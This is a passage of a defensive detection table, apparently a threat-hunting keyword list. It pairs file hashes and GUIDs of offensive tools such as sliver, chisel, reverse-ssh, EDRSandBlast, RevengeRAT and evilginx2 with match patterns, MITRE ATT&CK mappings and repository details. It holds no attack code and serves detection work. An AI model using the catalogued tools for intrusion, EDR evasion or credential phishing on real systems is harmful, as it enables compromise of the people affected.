T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*030cc05376c7c249583648d5324f8d2bad47ea9af1a4f1a751a09db700eb5817*",".{0,1000}030cc05376c7c249583648d5324f8d2bad47ea9af1a4f1a751a09db700eb5817.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*030d5d76052e0da4488b216db816fd13bdaf25e047f0b34820a2b55305f9fd8c*",".{0,1000}030d5d76052e0da4488b216db816fd13bdaf25e047f0b34820a2b55305f9fd8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0313676f45763c5b4e90928b7f9d357253db656f86f8326420f51bbb9fde9238*",".{0,1000}0313676f45763c5b4e90928b7f9d357253db656f86f8326420f51bbb9fde9238.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*031c6896d87b890a2cd54948297d5d804a5e3b52a067a81b7dd12c1c4ad77496*",".{0,1000}031c6896d87b890a2cd54948297d5d804a5e3b52a067a81b7dd12c1c4ad77496.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" 
"*0322cddf469dfbc17a818a30fb9eb4704a7217a62a8e5f7dc45ab3c89ab7dffe*",".{0,1000}0322cddf469dfbc17a818a30fb9eb4704a7217a62a8e5f7dc45ab3c89ab7dffe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*033ac18935c14c208d6caf86bcb38ea0422f1ace50be938e56d00a480b8e5611*",".{0,1000}033ac18935c14c208d6caf86bcb38ea0422f1ace50be938e56d00a480b8e5611.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*034B1C28-96B9-486A-B238-9C651EAA32CA*",".{0,1000}034B1C28\-96B9\-486A\-B238\-9C651EAA32CA.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*03600de62239db741db7a1d072a4e8504c25b64b7d398d5c80d467452aefbfad*",".{0,1000}03600de62239db741db7a1d072a4e8504c25b64b7d398d5c80d467452aefbfad.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*037abc006fd6d9877d3f63baa4d32ebedd18b5a1ce6f51c22aa0d18c7ad1e352*",".{0,1000}037abc006fd6d9877d3f63baa4d32ebedd18b5a1ce6f51c22aa0d18c7ad1e352.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","file_hash","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*03bf355ada5fc5ff405e694df967e893d9db590653fa89c1be81350aceda72d9*",".{0,1000}03bf355ada5fc5ff405e694df967e893d9db590653fa89c1be81350aceda72d9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*03c8bb25a392802593dc4cc97bbd596b5059ece8bebd36790bae7f6b7b2eb2c1*",".{0,1000}03c8bb25a392802593dc4cc97bbd596b5059ece8bebd36790bae7f6b7b2eb2c1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*040f67227ccb5fad854663f4162556c6c154d2ef4c0465e62d0ccef37ac4637a*",".{0,1000}040f67227ccb5fad854663f4162556c6c154d2ef4c0465e62d0ccef37ac4637a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0421df6cf7ecab2db20777414d571ce0daeffb52edf58ff6fb873826c4a1f6ad*",".{0,1000}0421df6cf7ecab2db20777414d571ce0daeffb52edf58ff6fb873826c4a1f6ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0430a3e7a1c50c8b42d5129089ca7f31a28d0b4a9aeda7a96a1d686fde52a9e4*",".{0,1000}0430a3e7a1c50c8b42d5129089ca7f31a28d0b4a9aeda7a96a1d686fde52a9e4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source 
cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0434b626258ae9832074c8693921e3252a1804e506e555b5053f0793fc9e6f09*",".{0,1000}0434b626258ae9832074c8693921e3252a1804e506e555b5053f0793fc9e6f09.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*04387d7368c1a46d5dc11600b888fbe5890e30a793019d408bde0565a6a3dadb*",".{0,1000}04387d7368c1a46d5dc11600b888fbe5890e30a793019d408bde0565a6a3dadb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0461e84f847489e8968b011128b6be6b001f487ae75b2a0c14ff6d4eafc9f2df*",".{0,1000}0461e84f847489e8968b011128b6be6b001f487ae75b2a0c14ff6d4eafc9f2df.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*04628de68152672ff3ddfb372e1daa31b2f124ac79f98f245913522da3675468*",".{0,1000}04628de68152672ff3ddfb372e1daa31b2f124ac79f98f245913522da3675468.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0472A393-9503-491D-B6DA-FA47CD567EDE*",".{0,1000}0472A393\-9503\-491D\-B6DA\-FA47CD567EDE.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" 
"*048c215b812c16ffa4d64a8f3da77e2418457e7d8eb89b2716bdb65f176a665a*",".{0,1000}048c215b812c16ffa4d64a8f3da77e2418457e7d8eb89b2716bdb65f176a665a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*04991e2f282b817df64efc7d76e57068f36993903e59c03acf05286cddbb75ff*",".{0,1000}04991e2f282b817df64efc7d76e57068f36993903e59c03acf05286cddbb75ff.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*04b76edf1ba46b49f42c67669dbc807e550682709c977665c0c7b37d2bb5e0d2*",".{0,1000}04b76edf1ba46b49f42c67669dbc807e550682709c977665c0c7b37d2bb5e0d2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49*",".{0,1000}04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*04ca7e137e1e9feead96a7df45bb67d5ab3de190*",".{0,1000}04ca7e137e1e9feead96a7df45bb67d5ab3de190.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*04d10bef7b5d5a3c16782bc908ec5ea1ceacf33588c12d65ee4d314f6133d0f7*",".{0,1000}04d10bef7b5d5a3c16782bc908ec5ea1ceacf33588c12d65ee4d314f6133d0f7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*",".{0,1000}04DFB6E4\-809E\-4C35\-88A1\-2CC5F1EBFEBD.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*",".{0,1000}04DFB6E4\-809E\-4C35\-88A1\-2CC5F1EBFEBD.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same 
result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*04eb0f500553c9d58de8f5a8bb102cba7dcb0d1e9a77baa4227237c49a5e81d8*",".{0,1000}04eb0f500553c9d58de8f5a8bb102cba7dcb0d1e9a77baa4227237c49a5e81d8.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*04FC654C-D89A-44F9-9E34-6D95CE152E9D*",".{0,1000}04FC654C\-D89A\-44F9\-9E34\-6D95CE152E9D.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*050c8a0def9c19dbc64296f5a4834a902756ed06a740bdc7e0170a8748792bd5*",".{0,1000}050c8a0def9c19dbc64296f5a4834a902756ed06a740bdc7e0170a8748792bd5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*052C26C0-7979-4555-89CE-34C5CE8D8B34*",".{0,1000}052C26C0\-7979\-4555\-89CE\-34C5CE8D8B34.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","N/A","10","10","81","47","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z" "*055BC73F-FCAE-4361-B035-2E156A101EA9*",".{0,1000}055BC73F\-FCAE\-4361\-B035\-2E156A101EA9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*056a00cd961e5d38f464d6a15393c92f3f0cef668e396f9595822e7147b4c25e*",".{0,1000}056a00cd961e5d38f464d6a15393c92f3f0cef668e396f9595822e7147b4c25e.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*05703420a4694ddc3d737d5f7dd589ff1288b05fec2bdc6f5b0f1227509429f9*",".{0,1000}05703420a4694ddc3d737d5f7dd589ff1288b05fec2bdc6f5b0f1227509429f9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0599c7537d4b728cd234412440a11a6cc54297b3c7af59c1d0309850aca0da53*",".{0,1000}0599c7537d4b728cd234412440a11a6cc54297b3c7af59c1d0309850aca0da53.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*05B4EB7F-3D59-4E6A-A7BC-7C1241578CA7*",".{0,1000}05B4EB7F\-3D59\-4E6A\-A7BC\-7C1241578CA7.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*05bdafc5a389b57dab75449e8932ad17eb9871d2767263e6d0576568319974d8*",".{0,1000}05bdafc5a389b57dab75449e8932ad17eb9871d2767263e6d0576568319974d8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*05f4184029b94e304fcef2f2c6875c1fb2a226f0d94fce013643727b10b169a5*",".{0,1000}05f4184029b94e304fcef2f2c6875c1fb2a226f0d94fce013643727b10b169a5.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses 
FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","file_hash","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*05f5eabab4a5f65f2bb08d967d6af41247465af213f1c874ad0e059c0a3ebedc*",".{0,1000}05f5eabab4a5f65f2bb08d967d6af41247465af213f1c874ad0e059c0a3ebedc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*05fd2d9fd3a8ebed7848e8acc758d0c7964b6d3c85ce81cdbbe93d679fe1acac*",".{0,1000}05fd2d9fd3a8ebed7848e8acc758d0c7964b6d3c85ce81cdbbe93d679fe1acac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*05fe66796ef2ccd1e425281d7b042a531891f5914281e22eabbf283635b6d6e9*",".{0,1000}05fe66796ef2ccd1e425281d7b042a531891f5914281e22eabbf283635b6d6e9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*061d593aaf747fa8db9674c17bc8d2baa9459b825a196f457b006ff00d4be696*",".{0,1000}061d593aaf747fa8db9674c17bc8d2baa9459b825a196f457b006ff00d4be696.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*064d0c20e561c1208898028b84dcebf37861b15f33c0a4828ea14ee055ba3f98*",".{0,1000}064d0c20e561c1208898028b84dcebf37861b15f33c0a4828ea14ee055ba3f98.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*065c05950f37c55ceff48bc70d2733424e7e92687faefc803719ff22a5e0156f*",".{0,1000}065c05950f37c55ceff48bc70d2733424e7e92687faefc803719ff22a5e0156f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0675558d182096b75d100d91c77c1119d229c315f12bb86e353e49894b9e1d62*",".{0,1000}0675558d182096b75d100d91c77c1119d229c315f12bb86e353e49894b9e1d62.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
